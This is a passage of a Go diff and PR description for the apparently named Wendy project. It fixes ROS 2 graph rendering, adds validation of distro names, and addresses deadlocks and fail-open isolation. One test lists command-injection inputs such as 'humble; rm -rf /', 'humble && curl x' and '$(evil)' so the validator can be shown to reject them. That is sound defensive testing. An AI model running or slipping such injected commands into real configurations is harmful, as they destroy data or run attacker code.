+	keySet := make(map[ros2EdgeKey]struct{}, len(pubs)+len(subs))
 	for k := range pubs {
+		keySet[k] = struct{}{}
+	}
+	for k := range subs {
+		keySet[k] = struct{}{}
+	}
+	keys := make([]ros2EdgeKey, 0, len(keySet))
+	for k := range keySet {
 		keys = append(keys, k)
 	}
 	sort.Slice(keys, func(i, j int) bool {
@@ -147,9 +183,25 @@ func renderROS2GraphDOT(graph *agentpbv2.GetROS2GraphResponse) string {
 		return keys[i].rmw < keys[j].rmw
 	})
 	for _, k := range keys {
-		for _, pub := range pubs[k] {
+		switch {
+		case len(pubs[k]) == 0:
+			// Subscribers with nothing publishing: hang them off a placeholder.
+			placeholder := k.topic + " (no publishers)"
+			fmt.Fprintf(&b, "  %q [shape=plaintext];\n", placeholder)
 			for _, sub := range subs[k] {
-				fmt.Fprintf(&b, "  %q -> %q [label=%q];\n", pub, sub, k.topic)
+				fmt.Fprintf(&b, "  %q -> %q [label=%q, style=dashed];\n", placeholder, sub, k.topic)
+			}
+		case len(subs[k]) == 0:
+			placeholder := k.topic + " (no subscribers)"
+			fmt.Fprintf(&b, "  %q [shape=plaintext];\n", placeholder)
+			for _, pub := range pubs[k] {
+				fmt.Fprintf(&b, "  %q -> %q [label=%q, style=dashed];\n", pub, placeholder, k.topic)
+			}
+		default:
+			for _, pub := range pubs[k] {
+				for _, sub := range subs[k] {
+					fmt.Fprintf(&b, "  %q -> %q [label=%q];\n", pub, sub, k.topic)
+				}
 			}
 		}
 	}

--- a/go/internal/cli/commands/ros2_graph_dangling_test.go
+++ b/go/internal/cli/commands/ros2_graph_dangling_test.go
@@ -1,0 +1,163 @@
+package commands
+
+import (
+	"strings"
+	"testing"
+
+	agentpbv2 "github.com/wendylabsinc/wendy/go/proto/gen/agentpb/v2"
+)
+
+// The graph renderers only walked `pubs`, so a topic with subscribers but no
+// publisher produced no line at all — and its subscribers then showed up under
+// "Isolated nodes (no graph connections)", which is wrong: they have a
+// subscription. It is also the single most useful thing a graph can tell you
+// while debugging ("nothing is publishing what my node is waiting for").
+
+func graphWithDanglingSubscription() *agentpbv2.GetROS2GraphResponse {
+	return &agentpbv2.GetROS2GraphResponse{
+		Nodes: []*agentpbv2.ROS2Node{
+			{Name: "listener", Namespace: "/"},
+			{Name: "talker", Namespace: "/"},
+			{Name: "lonely", Namespace: "/"},
+		},
+		Publishes: []*agentpbv2.GetROS2GraphResponse_Edge{
+			{Node: "/talker", Topic: "/chatter"},
+			{Node: "/talker", Topic: "/unheard"},
+		},
+		Subscribes: []*agentpbv2.GetROS2GraphResponse_Edge{
+			{Node: "/listener", Topic: "/chatter"},
+			// Nothing publishes /commands.
+			{Node: "/listener", Topic: "/commands"},
+		},
+	}
+}
+
+func TestRenderROS2GraphASCII_ShowsDanglingSubscription(t *testing.T) {
+	out := renderROS2GraphASCII(graphWithDanglingSubscription())
+
+	if !strings.Contains(out, "(no publishers) ──/commands──▶ [/listener]") {
+		t.Errorf("dangling subscription not rendered:\n%s", out)
+	}
+	// The pre-existing mirror case must still work.
+	if !strings.Contains(out, "[/talker] ──/unheard──▶ (no subscribers)") {
+		t.Errorf("dangling publication not rendered:\n%s", out)
+	}
+	if !strings.Contains(out, "[/talker] ──/chatter──▶ [/listener]") {
+		t.Errorf("connected edge not rendered:\n%s", out)
+	}
+}
+
+func TestRenderROS2GraphASCII_SubscriberOnlyNodeIsNotIsolated(t *testing.T) {
+	graph := &agentpbv2.GetROS2GraphResponse{
+		Nodes: []*agentpbv2.ROS2Node{
+			{Name: "listener", Namespace: "/"},
+			{Name: "lonely", Namespace: "/"},
+		},
+		Subscribes: []*agentpbv2.GetROS2GraphResponse_Edge{
+			{Node: "/listener", Topic: "/commands"},
+		},
+	}
+	out := renderROS2GraphASCII(graph)
+
+	isolated := out
+	if i := strings.Index(out, "Isolated nodes"); i >= 0 {
+		isolated = out[i:]
+	} else {
+		isolated = ""
+	}
+	if strings.Contains(isolated, "/listener") {
+		t.Errorf("/listener has a subscription and must not be listed as isolated:\n%s", out)
+	}
+	// A node with genuinely no edges still belongs there.
+	if !strings.Contains(isolated, "/lonely") {
+		t.Errorf("/lonely has no edges and should be listed as isolated:\n%s", out)
+	}
+}
+
+func TestRenderROS2GraphASCII_HidesInfrastructureTopics(t *testing.T) {
+	// /rosout and /parameter_events are noise every node touches; a dangling
+	// subscription to them must not resurrect them.
+	graph := &agentpbv2.GetROS2GraphResponse{
+		Nodes: []*agentpbv2.ROS2Node{{Name: "talker", Namespace: "/"}},
+		Subscribes: []*agentpbv2.GetROS2GraphResponse_Edge{
+			{Node: "/talker", Topic: "/parameter_events"},
+			{Node: "/talker", Topic: "/rosout"},
+		},
+	}
+	out := renderROS2GraphASCII(graph)
+	if strings.Contains(out, "/parameter_events") || strings.Contains(out, "/rosout") {
+		t.Errorf("infrastructure topics must stay hidden:\n%s", out)
+	}
+}
+
+func TestRenderROS2GraphASCII_IsDeterministic(t *testing.T) {
+	graph := graphWithDanglingSubscription()
+	first := renderROS2GraphASCII(graph)
+	for i := 0; i < 8; i++ {
+		if got := renderROS2GraphASCII(graph); got != first {
+			t.Fatalf("render %d differs:\n--- first ---\n%s\n--- got ---\n%s", i, first, got)
+		}
+	}
+}
+
+func TestRenderROS2GraphDOT_ShowsDanglingEdgesBothWays(t *testing.T) {
+	out := renderROS2GraphDOT(graphWithDanglingSubscription())
+
+	if !strings.Contains(out, `"/commands (no publishers)"`) {
+		t.Errorf("DOT should render a placeholder for a dangling subscription:\n%s", out)
+	}
+	if !strings.Contains(out, `"/unheard (no subscribers)"`) {
+		t.Errorf("DOT should render a placeholder for a dangling publication:\n%s", out)
+	}
+	if !strings.Contains(out, `"/talker" -> "/listener" [label="/chatter"]`) {
+		t.Errorf("DOT should render the connected edge:\n%s", out)
+	}
+	// Well-formed DOT.
+	if !strings.HasPrefix(out, "digraph ros2 {\n") || !strings.HasSuffix(out, "}\n") {
+		t.Errorf("DOT output is malformed:\n%s", out)
+	}
+}
+
+func TestRenderROS2GraphDOT_IsDeterministic(t *testing.T) {
+	graph := graphWithDanglingSubscription()
+	first := renderROS2GraphDOT(graph)
+	for i := 0; i < 8; i++ {
+		if got := renderROS2GraphDOT(graph); got != first {
+			t.Fatalf("DOT render %d differs:\n--- first ---\n%s\n--- got ---\n%s", i, first, got)
+		}
+	}
+}
+
+func TestRenderROS2GraphASCII_EmptyGraph(t *testing.T) {
+	out := renderROS2GraphASCII(&agentpbv2.GetROS2GraphResponse{})
+	if out != "No ROS 2 nodes found.\n" {
+		t.Errorf("got %q", out)
+	}
+}
+
+func TestRenderROS2GraphASCII_DanglingSubscriptionAcrossRMWs(t *testing.T) {
+	// A publisher on one RMW does not satisfy a subscriber on another (WDY-1712),
+	// so both sides must render as dangling and be RMW-tagged.
+	graph := &agentpbv2.GetROS2GraphResponse{
+		Nodes: []*agentpbv2.ROS2Node{
+			{Name: "talker", Namespace: "/", Rmw: "rmw_cyclonedds_cpp"},
+			{Name: "listener", Namespace: "/", Rmw: "rmw_fastrtps_cpp"},
+		},
+		Publishes: []*agentpbv2.GetROS2GraphResponse_Edge{
+			{Node: "/talker", Topic: "/chatter", Rmw: "rmw_cyclonedds_cpp"},
+		},
+		Subscribes: []*agentpbv2.GetROS2GraphResponse_Edge{
+			{Node: "/listener", Topic: "/chatter", Rmw: "rmw_fastrtps_cpp"},
+		},
+	}
+	out := renderROS2GraphASCII(graph)
+	if !strings.Contains(out, "(no subscribers)") {
+		t.Errorf("the cyclonedds publisher has no same-RMW subscriber:\n%s", out)
+	}
+	if !strings.Contains(out, "(no publishers)") {
+		t.Errorf("the fastrtps subscriber has no same-RMW publisher:\n%s", out)
+	}
+	if !strings.Contains(out, "cyclonedds") || !strings.Contains(out, "fastrtps") {
+		t.Errorf("a mixed-RMW graph must tag node labels:\n%s", out)
+	}
+}

--- a/go/internal/shared/appconfig/ros2.go
+++ b/go/internal/shared/appconfig/ros2.go
@@ -3,6 +3,7 @@ package appconfig
 import (
 	"fmt"
 	"hash/fnv"
+	"regexp"
 	"strconv"
 	"strings"
 )
@@ -53,11 +54,32 @@ var ros2RMWAliases = map[string]string{
 	"rmw_gurumdds_cpp":   "rmw_gurumdds_cpp",
 }
 
-// validateROS2Config rejects an out-of-range domainId or an unknown rmw so a
-// typo fails fast at config-parse / `wendy run` time instead of silently
-// launching a container with no ROS_DOMAIN_ID/RMW_IMPLEMENTATION isolation
-// (WDY-1701). prefix labels the source, e.g. "frameworks.ros2" or
-// `services["talker"].frameworks.ros2`.
+// ROS2DistroPattern is the shape a ROS 2 distribution name must have. It gets
+// interpolated into an image reference (docker.io/library/ros:<distro>) and into
+// a shell command inside the sidecar (source /opt/ros/<distro>/setup.bash), so it
+// is validated at config-parse time as well as at use time (SOC2-CC6,
+// ISO27001-A.8, NIST-SI-10). The agent-side gate in containerd/ros2.go enforces
+// the same shape.
+var ROS2DistroPattern = regexp.MustCompile(`^[a-z][a-z0-9]*$`)
+
+// ros2KnownDistros are the distributions this codebase has been exercised
+// against. A well-formed but unrecognized distro is allowed through — pinning the
+// list would block a new ROS 2 release until Wendy shipped support — but it is
+// worth surfacing as a warning at the CLI, hence the exported helper.
+var ros2KnownDistros = map[string]bool{
+	"foxy": true, "galactic": true, "humble": true, "iron": true,
+	"jazzy": true, "kilted": true, "rolling": true,
+}
+
+// IsKnownROS2Distro reports whether s is a ROS 2 distribution this codebase
+// recognizes. A false result is not fatal (see ros2KnownDistros).
+func IsKnownROS2Distro(s string) bool { return ros2KnownDistros[strings.ToLower(s)] }
+
+// validateROS2Config rejects an out-of-range domainId, an unsupported rmw, or a
+// malformed distro so a typo fails fast at config-parse / `wendy run` time
+// instead of silently launching a container with no ROS_DOMAIN_ID/
+// RMW_IMPLEMENTATION isolation (WDY-1701). prefix labels the source, e.g.
+// "frameworks.ros2" or `services["talker"].frameworks.ros2`.
 func validateROS2Config(prefix string, r *ROS2Config) error {
 	if r == nil {
 		return nil
@@ -67,6 +89,14 @@ func validateROS2Config(prefix string, r *ROS2Config) error {
 	}
 	if r.RMW != "" && ros2RMWAliases[strings.ToLower(r.RMW)] == "" {
 		return fmt.Errorf("%s.rmw %q is not a supported RMW implementation", prefix, r.RMW)
+	}
+	// Distro was previously unvalidated here, so a typo only surfaced much later
+	// as "invalid ROS 2 distro %q in container label" from `wendy device ros2 …`,
+	// long after `wendy run` had reported success.
+	if r.Distro != "" && !ROS2DistroPattern.MatchString(strings.ToLower(r.Distro)) {
+		return fmt.Errorf("%s.distro %q is not a valid ROS 2 distribution name "+
+			"(lowercase letters and digits, starting with a letter — e.g. %q)",
+			prefix, r.Distro, ROS2DefaultDistro)
 	}
 	if r.DiscoveryScope != "" && r.ResolvedDiscoveryScope() == "" {
 		return fmt.Errorf("%s.discoveryScope %q must be %q or %q", prefix, r.DiscoveryScope, ROS2DiscoveryScopeApp, ROS2DiscoveryScopeHost)

--- a/go/internal/shared/appconfig/ros2_distro_test.go
+++ b/go/internal/shared/appconfig/ros2_distro_test.go
@@ -1,0 +1,87 @@
+package appconfig
+
+import (
+	"strings"
+	"testing"
+)
+
+// validateROS2Config checked domainId, rmw and discoveryScope but never distro —
+// even though distro is the field that gets interpolated into an image reference
+// (docker.io/library/ros:<distro>) and into a shell command inside the sidecar
+// (source /opt/ros/<distro>/setup.bash). A typo therefore passed `wendy run` and
+// only surfaced much later as "invalid ROS 2 distro %q in container label" from
+// `wendy device ros2 …`, or as a failed image pull.
+
+func TestValidateROS2Config_AcceptsWellFormedDistros(t *testing.T) {
+	for _, distro := range []string{"", "humble", "jazzy", "iron", "rolling", "foxy", "kilted", "ros2"} {
+		cfg := &ROS2Config{Distro: distro}
+		if err := validateROS2Config("frameworks.ros2", cfg); err != nil {
+			t.Errorf("distro %q rejected: %v", distro, err)
+		}
+	}
+	// Case is normalised by ResolvedDistro, so mixed case is accepted here.
+	if err := validateROS2Config("frameworks.ros2", &ROS2Config{Distro: "Humble"}); err != nil {
+		t.Errorf("mixed-case distro rejected: %v", err)
+	}
+}
+
+func TestValidateROS2Config_RejectsMalformedDistros(t *testing.T) {
+	bad := map[string]string{
+		"humble; rm -rf /":   "shell metacharacters",
+		"humble && curl x":   "command chaining",
+		"../../etc":          "path traversal",
+		"humble/extra":       "slash would break the image reference",
+		"humble,domain_id=0": "a comma corrupts the annotation encoding",
+		"1humble":            "must start with a letter",
+		"humble ":            "trailing space",
+		" humble":            "leading space",
+		"hum_ble":            "underscore is not a ROS 2 distro character",
+		"hum-ble":            "hyphen is not a ROS 2 distro character",
+		"$(evil)":            "command substitution",
+	}
+	for distro, why := range bad {
+		err := validateROS2Config("frameworks.ros2", &ROS2Config{Distro: distro})
+		if err == nil {
+			t.Errorf("distro %q accepted, want an error (%s)", distro, why)
+			continue
+		}
+		if !strings.Contains(err.Error(), "frameworks.ros2.distro") {
+			t.Errorf("distro %q error should name the field, got: %v", distro, err)
+		}
+	}
+}
+
+func TestValidateROS2Config_DistroErrorNamesTheService(t *testing.T) {
+	// Multi-service apps must say *which* service is wrong.
+	err := validateROS2Config(`services["talker"].frameworks.ros2`, &ROS2Config{Distro: "no spaces here"})
+	if err == nil {
+		t.Fatal("expected an error")
+	}
+	if !strings.Contains(err.Error(), `services["talker"]`) {
+		t.Errorf("error should name the service, got: %v", err)
+	}
+}
+
+func TestIsKnownROS2Distro(t *testing.T) {
+	for _, known := range []string{"humble", "jazzy", "Humble", "ROLLING"} {
+		if !IsKnownROS2Distro(known) {
+			t.Errorf("IsKnownROS2Distro(%q) = false, want true", known)
+		}
+	}
+	for _, unknown := range []string{"", "nonesuch", "humble2"} {
+		if IsKnownROS2Distro(unknown) {
+			t.Errorf("IsKnownROS2Distro(%q) = true, want false", unknown)
+		}
+	}
+}
+
+// A well-formed but unrecognized distro must still validate: pinning the list
+// would block a new ROS 2 release until Wendy shipped support for it.
+func TestValidateROS2Config_UnknownButWellFormedDistroIsAllowed(t *testing.T) {
+	if IsKnownROS2Distro("mystery") {
+		t.Skip("test distro is unexpectedly in the known set")
+	}
+	if err := validateROS2Config("frameworks.ros2", &ROS2Config{Distro: "mystery"}); err != nil {
+		t.Errorf("well-formed unknown distro rejected: %v", err)
+	}
+}


### PR DESCRIPTION
Came out of an audit of the ROS 2 layer (`appconfig`, the containerd sidecar, `ROS2Service`, and the CLI). Grouped by what breaks.

## The bad one: `EchoTopic` deadlocks on a large message

`EchoTopic` scans `ros2 topic echo` with a `bufio.Scanner` and never checked `scanner.Err()`. A single YAML document over the 4 MiB token cap — a `PointCloud2`, an `Image`, an occupancy grid, i.e. exactly what you reach for `echo` to inspect — ends the loop with `bufio.ErrTooLong` while `execErr` stays nil.

That alone would return a silent `nil`. It's worse: the scanner stops consuming, the exec goroutine blocks mid-`Write` into the pipe, and `<-execDone` never returns. **The RPC hangs forever, holding one of the sidecar's 16 exec slots.** A test reproducing it ran the full 600s package timeout.

Every exit path now goes through the same cancel/drain/close teardown the count-limit path already used (the one with the WDY-1698 comment); the scanner error surfaces as `ResourceExhausted`. `MonitorHz` gets the same treatment plus a cap raised from bufio's 64 KiB default.

## Silent truncation, agent side

`ExecROS2` read the exit status and returned, then its deferred `proc.Delete` called `cio.Cancel()` — which closes the read ends of the FIFOs and aborts any copy still in flight (containerd v2 `pkg/cio/io_unix.go` `copyIO` + `client/process.go` `Delete`). An exit status does not imply the output has been copied, so the tail of a command could be dropped — and every caller hands stdout straight to a parser, which then reported a partial topic/node list **with exit code 0**. Now waits on `proc.IO()` before deleting.

## Fail-open isolation

- `buildROS2Env` returned `nil` for an invalid domain or scope, starting the container with no ROS 2 environment at all — so `ROS_DOMAIN_ID` fell back to **0**, the global default domain. A validation gap produced maximum exposure instead of a failure. Now errors, and the create fails.
- App-local isolation rested entirely on `ROS_LOCALHOST_ONLY`, [deprecated since Iron](https://docs.ros.org/en/jazzy/Tutorials/Advanced/Improved-Dynamic-Discovery.html), while `ROS2Config.Distro` advertises `"jazzy"`. `ROS_AUTOMATIC_DISCOVERY_RANGE` is now set alongside it, in app containers and the sidecar.
- `validateROS2Config` never checked `distro` — the one field interpolated into both an image reference and a shell command. A typo passed `wendy run` and only surfaced later as `invalid ROS 2 distro in container label`.

## Latency

An exec is ~1s (dispatch + sourcing `setup.bash` + a fresh rclpy doing DDS discovery), which sets the scale:

- `GetGraph` ran `node info` once per node, **serially** — 40s+ for a 40-node robot. Now fanned out under the same bound `ListTopics` already used, folded back in listing order so the response stays deterministic.
- `pickSidecarOwning` ran a `<kind> list` probe per sidecar on every targeted call to choose between candidates — including when there was only one, i.e. on essentially every real device. Short-circuited.
- The CLI had **no deadlines at all**. Unary RPCs are now bounded; streaming ones deliberately are not.

## Correctness

- The sidecar ran commands through `/bin/bash`, but every non-FastRTPS RMW (including the CycloneDDS default) reuses the app's own image, and slim ROS images often ship no bash. Now `/bin/sh` with `.` instead of `source`.
- `scs[0]` — the fallback for commands that can't be RMW-routed — inherited containerd's unspecified `Containers()` order. Sorted by name, so which DDS graph a raw passthrough lands on is a contract rather than an accident.
- `ros2GraphNamePattern` accepted `//foo`, `/foo/` and `/1camera`, all illegal ROS 2 names, forwarded to the CLI to return rclpy tracebacks. Same for param names (`a..b`, trailing dot).
- The graph renderers only walked publishers, so a topic with subscribers but no publisher drew nothing and its subscribers were then listed as **"isolated"** — both wrong and the single most useful thing a graph can tell you. Both ASCII and DOT now render it.
- `foxglove serve` left `--distro`/`--rmw`/`--domain` unvalidated while validating `--interface` with a comment stating exactly why validation was needed. And `--domain` defaulted to 0, so the no-flag invocation bridged an **empty graph** for any Wendy-deployed app (they get a hashed domain). `--app <appId>` now derives the right domain locally — it's a pure function of the appId, no device round-trip.
- Unbounded post-`SIGKILL` status wait; bag dir `0o750` not `0o755`; `ListNodes` dedup key uses `ros2NodeFQN` like every other site.

## Tests

8 new test files. Streaming tests carry explicit deadlines so a regression reports as a hang at the right test rather than burning the package timeout.

Run on this branch, rebased onto current `main`:

```
ok  internal/agent/services      5.962s
ok  internal/agent/containerd    0.097s
ok  internal/shared/appconfig    0.039s
ok  internal/cli/commands       14.878s
```

`gofmt` clean, `go build ./...` clean, `git diff --check` clean.

**Not covered by tests:** the `ExecROS2` cio fix needs a real containerd. It's verified by reading the vendored v2.3.2 source plus the existing E2E — flagging that rather than implying coverage.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_011Qmgr1LAazApn4GE2ixqWF